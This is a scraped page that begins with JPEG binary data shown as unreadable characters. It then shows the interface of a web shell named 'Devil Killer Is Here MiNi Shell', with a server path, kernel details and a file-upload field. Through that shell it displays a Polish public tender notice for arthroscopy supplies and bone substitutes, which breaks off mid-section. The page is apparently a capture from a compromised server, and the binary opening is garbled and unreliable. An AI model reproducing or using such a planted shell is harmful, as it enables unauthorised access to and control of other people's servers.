JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210908/0017433401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa akcesoriów do artroskopii i substytuty kości </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Opieki Zdrowotnej w Strzyżowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370482512</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Dąbrowskiego</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strzyżów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">17 2761201</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">17 27 61 058</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi.as@zozstrzyzow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zozstrzyzow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - związki podmiotów, o których mowa w art. 4 pkt 1 lub 2 ustawy lub podmiotów, o których mowa w art. 4 pkt. 3 ustawy</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa akcesoriów do artroskopii i substytuty kości </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-93379986-0fbe-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00174334</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00006483/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.7 Dostawa akcesoriów do artroskopii </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu<br/>https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej:przetargi.as@zozstrzyzow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacjiprzekazywanych przy ich użyciu zostały<br/>opisane w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. Oferta powinna<br/>byćsporządzona w języku polskim z zachowaniem postaci elektronicznej w szczególności w formacie<br/>danych .pdf, .doc, .odt, ..docx i musi być podpisana kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym przez osobę/osoby uprawnioną/uprawnione pod<br/>rygoremnieważności. Sposób złożenia oferty w tym zaszyfrowania oferty opisany został w Regulaminie<br/>korzystania z miniPortalu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja w zakresie art. 13 RODO związana z<br/>postępowaniem o udzielenie zamówienia publicznego: W związku z rozpoczęciem stosowania z<br/>dniem25 maja 2018 r. Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia<br/>2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie oochronie danych, dalej: RODO) informujemy, iż na podstawie art. 13 RODO od dnia<br/>25 maja 2018 r. będą Pani/Panu przysługiwały określone poniżej prawa związane z przetwarzaniem<br/>Pani/Pana danych osobowych przez Zespół Opieki Zdrowotnej w Strzyżowie (dalej: ZOZ<br/>Strzyżów).AdministratoremPani/Pana danych osobowych jest Dyrektor Zespołu Opieki Zdrowotnej w<br/>Strzyżowie z siedzibą przy ul.Dąbrowskiego 10, 38-100 Strzyżów (nr tel. +48 17 27 61 201, adres email:<br/>sekretariat@zozstrzyżów.pl).W ZOZ Strzyżów wyznaczony został Inspektor Ochrony Danych, z<br/>którym można skontaktować się drogą elektroniczną pod adresem e-mail:<br/>iod@zozstrzyzow.pl.Pani/Pana daneosobowe będą przetwarzane na podstawie art. 6 ust. 1 lit. a<br/>RODO w następujących celach:•postępowania o udzielenie zamówienia publicznego nr: ZOZ.ZP-382-<br/>3/21• realizacji zamówienia przez Wykonawcę. W związku z przetwarzaniem danych w celach<br/>wskazanych w pkt 19.11.4, Pani/Pana dane osobowe mogą być udostępniane innym odbiorcom lub<br/>kategoriom odbiorców danychosobowych. Odbiorcami Pani/Pana danych osobowych mogą być tylko<br/>podmioty uprawnione do odbioru Pani/Pana danych, w tym państwa trzecie, w uzasadnionych<br/>przypadkach i na podstawie odpowiednich przepisów prawa. Pani/Pana dane osobowe będą<br/>przetwarzane na podstawie przepisówprawa, przez okres niezbędny do realizacji celów przetwarzania<br/>wskazanych w pkt , lecz nie krócej niż okres wskazany w przepisach o archiwizacji. Podanie danych<br/>jest dobrowolne, ale konieczne w celu przeprowadzenia postępowania o udzielenie zamówienia<br/>publicznego oraz realizacji zamówienia, wktórej Pani/Pan będzie brał/a udział. W związku z<br/>przetwarzaniem przez ZOZ Strzyżów, Pani/Pana danych osobowych, przysługuje Pani/Panu prawo<br/>do:• dostępu do treści danych, na podstawie art. 15 RODO z zastrzeżeniem, że udostępniane dane<br/>osobowe nie mogą ujawniać informacji niejawnych, aninaruszać tajemnic prawnie chronionych, do<br/>których zachowania zobowiązany jest Dyrektor ZOZ Strzyżów;• sprostowania danych, na podstawie<br/>art. 16 RODO;• ograniczenia przetwarzania danych, na podstawie art. 18 RODO;W przypadku<br/>uznania, iż przetwarzanie przez ZOZ Strzyżów Pani/Pana danych osobowych narusza przepisy RODO,<br/>przysługuje Pani/Panu prawo do wniesienia skargi doorganu nadzorczego, o którym mowa w art. 51<br/>RODO. Udostępnione dane nie będą podlegały profilowaniu.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie dotyczy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZOZ.ZP-382-13/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 119730,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na kilka części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1 System do separacji krwi: 1	Jednorazowy zestaw separujący krew na poszczególne frakcje. Sterylny, jednorazowy system podwójnej strzykawki gwarantujący zamknięty obieg krwi. Umożliwia przetwarzanie do 15ml krwi. System gwarantuje pełne bezpieczeństwo sterylności, tzn. od początku procesu separacji, czyli od momentu wprowadzenia krwi do obwodu zamkniętego, sterylnego zestawu, do końca procesu, czyli momentu zebrania się koncentratu w gotowej do aplikacji strzykawce, nie dochodziło do konieczności ingerencji Operatora. W 100% autologiczny – nie wymaga dodawania antykoagulantu do przetwarzanej krwi (04576)	sztuka	120 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 26400,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33183100-7 - Implanty ortopedyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-05-18</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1	Oryginalne, jednorazowego użycia ostrza do shavera do posiadanej przez Zamawiającego rękojeści shavera artroskopowego, kompatybilnej z posiadaną przez Zamawiającego. Ostrza pakowane sterylnie, pojedynczo w opakowaniach zbiorczych po 5 sztuk z rodzaju. Ostrza typu frezy kostne w średnicach: 3,0; 4,0; 4,5; 5,0; 5,5 mm: lub ostrza do tkanki miękkiej w średnicach: 2,0; 3,0; 3,5; 3,8; 4,0, 4,2; 5,0; 5,5 mm. Ostrza kostne z sześcioma; ośmioma; dziesięcioma lub dwunastoma wyżłobieniami na części roboczej ostrza. Możliwość zaoferowania ostrzy do małych stawów oraz ostrzy w wersji wydłużonej do biodra oraz ostrzy typu: ostrze dysektor - do mikrozłamań (4,0 mm 30* lub 45*), - raszpla (3,5 mm; 4,0mm; 5,5 mm) (05294)	sztuka	40<br/>2	Dren jednorazowy kompletny w torze napływu do posiadanej przez Zamawiającego pompy artroskopowej DualWave firmy Arthrex	sztuka	60<br/>3	Dren dobowy w torze napływu do posiadanej przez Zamawiającego pompy artroskopowej DualWave firmy Arthrex	sztuka	150<br/>4	Dren pacjenta ze złączem luer w torze napływu do posiadanej przez Zamawiającego pompy artroskopowej DualWave firmy Arthrex (05256)	sztuka	400 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 47800,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-05-18</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1	Elektroda jednorazowa do waporyzacji tkanek, typu Lat lub równoważne spełniająca następujące wymagania: średnica 3,5 mm; komplet zawierający kabel, uchwyt ze sterowaniem oraz elektrodę; do posiadanej przez Zamawiającego konsoli do waporyzacji firmy Stryker (03066)	szt	10<br/>2	Jednorazowe ostrza do artroskopii, typ Aggressive Plus lub równoważne spełniające następujące wymagania: rozmiary 3,5 mm, 4,0mm; 5,0mm; 5,5mm; średnica ostrza kodowana kolorem, kompatybilne z posiadanym przez Zamawiającego shaverem Formuła firmy Stryker (opak. a 5 sztuk ) (3,5 - 03128; 4,0 - 03067; 5,0 - 03068; 5,5 – 03069)	szt 50 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 14250,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-05-18</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1	"Substytut kości:<br/>- macierz osteokondukcyjna składająca się 2-10µm warstwy hydroksyapatytu na rdzeniu z węglanu wapnia<br/>- struktura i skład zbliżony do ludzkiej kości gąbczastej<br/>- pory 280-770 µm<br/>- wchłanianie 6-18 miesięcy<br/>- granulki 1-4mm<br/>- do mieszania z krwią i szpikiem<br/>- opakowanie 5ml"	szt	20<br/>2	"Substytut kości:<br/>- macierz osteokondukcyjna składająca się 2-10µm warstwy hydroksyapatytu na rdzeniu z węglanu wapnia<br/>- struktura i skład zbliżony do ludzkiej kości gąbczastej<br/>- pory 280-770 µm<br/>- wchłanianie 6-18 miesięcy<br/>- granulki 1-4mm<br/>- do mieszania z krwią i szpikiem<br/>- opakowanie 10ml"	szt 10 <br/>3	"Substytut kości:<br/>- macierz osteokondukcyjna składająca się 2-10µm warstwy hydroksyapatytu na rdzeniu z węglanu wapnia<br/>- struktura i skład zbliżony do ludzkiej kości gąbczastej<br/>- pory 280-770 µm<br/>- wchłanianie 6-18 miesięcy<br/>- granulki 1-4mm<br/>- do mieszania z krwią i szpikiem<br/>- opakowanie 15ml"	szt 5 <br/>4	"Substytut kości:<br/>- macierz osteokondukcyjna składająca się 2-10µm warstwy hydroksyapatytu na rdzeniu z węglanu wapnia<br/>- struktura i skład zbliżony do ludzkiej kości gąbczastej<br/>- pory 280-770 µm<br/>- wchłanianie 6-18 miesięcy<br/>- granulki 1-4mm<br/>- do mieszania z krwią i szpikiem<br/>- opakowanie 20ml"	szt 5 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 31280,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-05-18</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania 